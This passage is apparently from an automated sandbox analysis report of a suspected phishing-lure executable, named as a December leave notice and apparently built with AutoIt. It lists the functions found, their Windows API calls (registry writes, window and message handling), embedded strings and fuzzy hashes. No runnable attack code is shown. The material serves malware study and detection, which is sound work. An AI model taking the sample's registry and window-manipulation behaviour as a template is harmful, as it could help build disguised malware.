                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Foreground
                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                      • API String ID: 62970417-1919597938
                                                      • Opcode ID: d73a6880702333bc9968a3421fb26dd5525daa40bb7da5d41f9b012c20c88192
                                                      • Instruction ID: 55847b62ea1b556da6a4d505e681c93c64c1d313c1429ae052c783b579fec1d4
                                                      • Opcode Fuzzy Hash: d73a6880702333bc9968a3421fb26dd5525daa40bb7da5d41f9b012c20c88192
                                                      • Instruction Fuzzy Hash: EFD1183150464A9BDB44EF60CC81AEABBB4BF54314F004A1DF586932B1DB34F99AFB91
                                                      Function 00FE3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FE3735
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0101DC00,00000000,?,00000000,?,?), ref: 00FE37A3
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00FE37EB
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00FE3874
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FE3B94
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FE3BA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: cbd471c316ce6098e665fc89294b442d96d36cdabbcacf6fd0d49c225dfc24a6
                                                      • Instruction ID: 6c279155f719285bbee96c6eb0b25cdf7bcfd0af9a06a62a8c474116719623c6
                                                      • Opcode Fuzzy Hash: cbd471c316ce6098e665fc89294b442d96d36cdabbcacf6fd0d49c225dfc24a6
                                                      • Instruction Fuzzy Hash: 5F027B756046019FDB15EF15CC49A6AB7E9FF88720F04845CF99A9B3A1CB34ED01EB81
                                                      Function 00FE6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FE6C56
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FE6D16
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 3974292440-719923060
                                                      • Opcode ID: b675997c041e0bfac2cb5978cd43533da5671eb628fa54c2db029ea3220632d6
                                                      • Instruction ID: 8e2a56fe55c4f86e88ab9891876b55cc923ad796acb33e275515eb0497dc3bf7
                                                      • Opcode Fuzzy Hash: b675997c041e0bfac2cb5978cd43533da5671eb628fa54c2db029ea3220632d6
                                                      • Instruction Fuzzy Hash: A0A180306043859FCB14EF25CC51AAAB3A5FF94364F14496DB8A69B3D2DB38EC05EB41
                                                      Function 00FBCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FBCF91
                                                      • __swprintf.LIBCMT ref: 00FBD032
                                                      • _wcscmp.LIBCMT ref: 00FBD045
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FBD09A
                                                      • _wcscmp.LIBCMT ref: 00FBD0D6
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00FBD10D
                                                      • GetDlgCtrlID.USER32(?), ref: 00FBD15F
                                                      • GetWindowRect.USER32(?,?), ref: 00FBD195
                                                      • GetParent.USER32(?), ref: 00FBD1B3
                                                      • ScreenToClient.USER32(00000000), ref: 00FBD1BA
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FBD234
                                                      • _wcscmp.LIBCMT ref: 00FBD248
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00FBD26E
                                                      • _wcscmp.LIBCMT ref: 00FBD282
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                      • String ID: %s%u
                                                      • API String ID: 3119225716-679674701
                                                      • Opcode ID: 66ac2842c6f74934043e7424fb5201de9c9d4a701400f96312605665c0a0ce67
                                                      • Instruction ID: 67daf375a732a118183835c2fc7fa18d5b362707377011a48ca0dcf38f89ab9d
                                                      • Opcode Fuzzy Hash: 66ac2842c6f74934043e7424fb5201de9c9d4a701400f96312605665c0a0ce67
                                                      • Instruction Fuzzy Hash: 1AA10071A04742AFD715DF65C884FEAB7A8FF44364F008529F999D2180EB34EA05DFA2
                                                      Function 00FBD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00FBD8EB
                                                      • _wcscmp.LIBCMT ref: 00FBD8FC
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FBD924
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00FBD941
                                                      • _wcscmp.LIBCMT ref: 00FBD95F
                                                      • _wcsstr.LIBCMT ref: 00FBD970
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00FBD9A8
                                                      • _wcscmp.LIBCMT ref: 00FBD9B8
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FBD9DF
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00FBDA28
                                                      • _wcscmp.LIBCMT ref: 00FBDA38
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00FBDA60
                                                      • GetWindowRect.USER32(00000004,?), ref: 00FBDAC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
                                                      • Opcode ID: 9416eda9b858d7306c3fbeceee05cfa86021a7ca64710f6687b4bd606a2bca21
                                                      • Instruction ID: 52b7570b98c57dcf0fc2ad9fc09f732f16d9207b648e5bce8e0dc841da7bfa90
                                                      • Opcode Fuzzy Hash: 9416eda9b858d7306c3fbeceee05cfa86021a7ca64710f6687b4bd606a2bca21
                                                      • Instruction Fuzzy Hash: E281B1314083059BDB15DF51C885BEA7BE8FF84724F04846AFD899A086EB38DD45DFA2
                                                      Function 00FBD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: 5d7aef30c0fdba7645e5b2959bf2ff02677ec9e6412074e506430798dc468b45
                                                      • Instruction ID: cc1b186fc5de63e7dccf6e68ec242a0f2a2ff1b968a5867138cb6c4dafbc00b0
                                                      • Opcode Fuzzy Hash: 5d7aef30c0fdba7645e5b2959bf2ff02677ec9e6412074e506430798dc468b45
                                                      • Instruction Fuzzy Hash: 71318131A44209AADB18FA62DE53FED73B89F61711F300129F481B50D1FF69AE04EB56
                                                      Function 00FBEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 00FBEAB0
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FBEAC2
                                                      • SetWindowTextW.USER32(?,?), ref: 00FBEAD9
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00FBEAEE
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00FBEAF4
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FBEB04
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00FBEB0A
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FBEB2B
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FBEB45
                                                      • GetWindowRect.USER32(?,?), ref: 00FBEB4E
                                                      • SetWindowTextW.USER32(?,?), ref: 00FBEBB9
                                                      • GetDesktopWindow.USER32 ref: 00FBEBBF
                                                      • GetWindowRect.USER32(00000000), ref: 00FBEBC6
                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00FBEC12
                                                      • GetClientRect.USER32(?,?), ref: 00FBEC1F
                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00FBEC44
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FBEC6F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                      • String ID:
                                                      • API String ID: 3869813825-0
                                                      • Opcode ID: 0b981dd5e63f9c919d4aa480d28bd7998b4dfed1730442d47eaf6d9f57e77e3c
                                                      • Instruction ID: 9c24291799d32c3630f9b45b3eb543bdac11ca8c6ff434117d6eac322a60633b
                                                      • Opcode Fuzzy Hash: 0b981dd5e63f9c919d4aa480d28bd7998b4dfed1730442d47eaf6d9f57e77e3c
                                                      • Instruction Fuzzy Hash: D3515E71900709EFDB219FA9CD89BAEBBF9FF48704F004918E586A2590C779A944DF10
                                                      Function 00FD79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00FD79C6
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00FD79D1
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00FD79DC
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00FD79E7
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00FD79F2
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00FD79FD
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00FD7A08
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00FD7A13
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00FD7A1E
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00FD7A29
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00FD7A34
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00FD7A3F
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00FD7A4A
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00FD7A55
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00FD7A60
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00FD7A6B
                                                      • GetCursorInfo.USER32(?), ref: 00FD7A7B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$Info
                                                      • String ID:
                                                      • API String ID: 2577412497-0
                                                      • Opcode ID: cf0aa9ed8cd6ac4c7915176bf6d8e00727d419dcb294de048d7fdc5b801cdfec
                                                      • Instruction ID: 28846237dc4f1e6dc8bda7ee43c52f628d41d20283c4439ff0e4a8419cd2260f
                                                      • Opcode Fuzzy Hash: cf0aa9ed8cd6ac4c7915176bf6d8e00727d419dcb294de048d7fdc5b801cdfec
                                                      • Instruction Fuzzy Hash: 5E3117B1D083196ADB509FB68C8995FBFE9FF04750F544527A50DE7280EB7CA5008FA1
                                                      Function 00F8C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F8C8B7,?,00002000,?,?,00000000,?,00F8419E,?,?,?,0101DC00), ref: 00F9E984
                                                        • Part of subcall function 00F8660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F853B1,?,?,00F861FF,?,00000000,00000001,00000000), ref: 00F8662F
                                                      • __wsplitpath.LIBCMT ref: 00F8C93E
                                                        • Part of subcall function 00FA1DFC: __wsplitpath_helper.LIBCMT ref: 00FA1E3C
                                                      • _wcscpy.LIBCMT ref: 00F8C953
                                                      • _wcscat.LIBCMT ref: 00F8C968
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00F8C978
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F8CABE
                                                        • Part of subcall function 00F8B337: _wcscpy.LIBCMT ref: 00F8B36F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 2258743419-1018226102
                                                      • Opcode ID: b606c7cf6b40c5a412b77225838aa47156e3d2ac503f4283e3e936b93989ed2e
                                                      • Instruction ID: 99ae168355a5ce2d2385feadde0ab91a6a87ed99be37462837dccee20eb8ad5b
                                                      • Opcode Fuzzy Hash: b606c7cf6b40c5a412b77225838aa47156e3d2ac503f4283e3e936b93989ed2e
                                                      • Instruction Fuzzy Hash: 2B12A0715083459FC724EF24C881AAFBBE4BFD9314F00491EF58993261DB38D949EBA2
                                                      Function 00FECE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FECEFB
                                                      • DestroyWindow.USER32(?,?), ref: 00FECF73
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FECFF4
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FED016
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FED025
                                                      • DestroyWindow.USER32(?), ref: 00FED042
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F80000,00000000), ref: 00FED075
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FED094
                                                      • GetDesktopWindow.USER32 ref: 00FED0A9
                                                      • GetWindowRect.USER32(00000000), ref: 00FED0B0
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FED0C2
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FED0DA
                                                        • Part of subcall function 00F9B526: GetWindowLongW.USER32(?,000000EB), ref: 00F9B537
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 3877571568-3619404913
                                                      • Opcode ID: 2efe135b30491226c8f8cc45e3bbe045de7cb4794ef2d7de9de9f297f27685bc
                                                      • Instruction ID: e183cccd66743b8a9cc6082a06f984d808dec50358d32ed0702e1430f46839de
                                                      • Opcode Fuzzy Hash: 2efe135b30491226c8f8cc45e3bbe045de7cb4794ef2d7de9de9f297f27685bc
                                                      • Instruction Fuzzy Hash: 1571EEB4540345AFDB21CF68CC84FA63BE5FB88714F08451DFA8587295D739E842EB22
                                                      Function 00FEF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00FEF37A
                                                        • Part of subcall function 00FED7DE: ClientToScreen.USER32(?,?), ref: 00FED807
                                                        • Part of subcall function 00FED7DE: GetWindowRect.USER32(?,?), ref: 00FED87D
                                                        • Part of subcall function 00FED7DE: PtInRect.USER32(?,?,00FEED5A), ref: 00FED88D
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FEF3E3
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FEF3EE
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FEF411
                                                      • _wcscat.LIBCMT ref: 00FEF441
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FEF458
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FEF471
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00FEF488
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00FEF4AA
                                                      • DragFinish.SHELL32(?), ref: 00FEF4B1
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00FEF59C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 169749273-3440237614
                                                      • Opcode ID: 22d8ccc0a9d8be042c0bce514c07f3a164468e610768cef133b31bb2dabcd2ce
                                                      • Instruction ID: 53109b3b94c6dd6aba3fe9a9fca66ee3424a34e46785a9c3d50560155b0d5ff5
                                                      • Opcode Fuzzy Hash: 22d8ccc0a9d8be042c0bce514c07f3a164468e610768cef133b31bb2dabcd2ce
                                                      • Instruction Fuzzy Hash: 1E615A71108300AFC311EFA5CC85E9FBBE8BF89714F000A1EF595961A1DB35DA09DB62
                                                      Function 00FCAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 00FCAB3D
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00FCAB46
                                                      • VariantClear.OLEAUT32(?), ref: 00FCAB52
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00FCAC40
                                                      • __swprintf.LIBCMT ref: 00FCAC70
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00FCAC9C
                                                      • VariantInit.OLEAUT32(?), ref: 00FCAD4D
                                                      • SysFreeString.OLEAUT32(00000016), ref: 00FCADDF
                                                      • VariantClear.OLEAUT32(?), ref: 00FCAE35
                                                      • VariantClear.OLEAUT32(?), ref: 00FCAE44
                                                      • VariantInit.OLEAUT32(00000000), ref: 00FCAE80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      • API String ID: 3730832054-3931177956
                                                      • Opcode ID: a177a51df0173f9e63415da028d555efb4832e2e2b77cf421f54b5c88c959b0d
                                                      • Instruction ID: 9cfa70e7746432ab99810594c542437209c8b11d490600f65dee36f85df9a9a8
                                                      • Opcode Fuzzy Hash: a177a51df0173f9e63415da028d555efb4832e2e2b77cf421f54b5c88c959b0d
                                                      • Instruction Fuzzy Hash: 7ED10232A0011BDBDB249FA5C986FA9B7B5BF44714F14805DE4069B180CB79FC40FBA2
                                                      Function 00FE716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FE71FC
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FE7247
                                                      Strings
                                                      Memory Dump Source
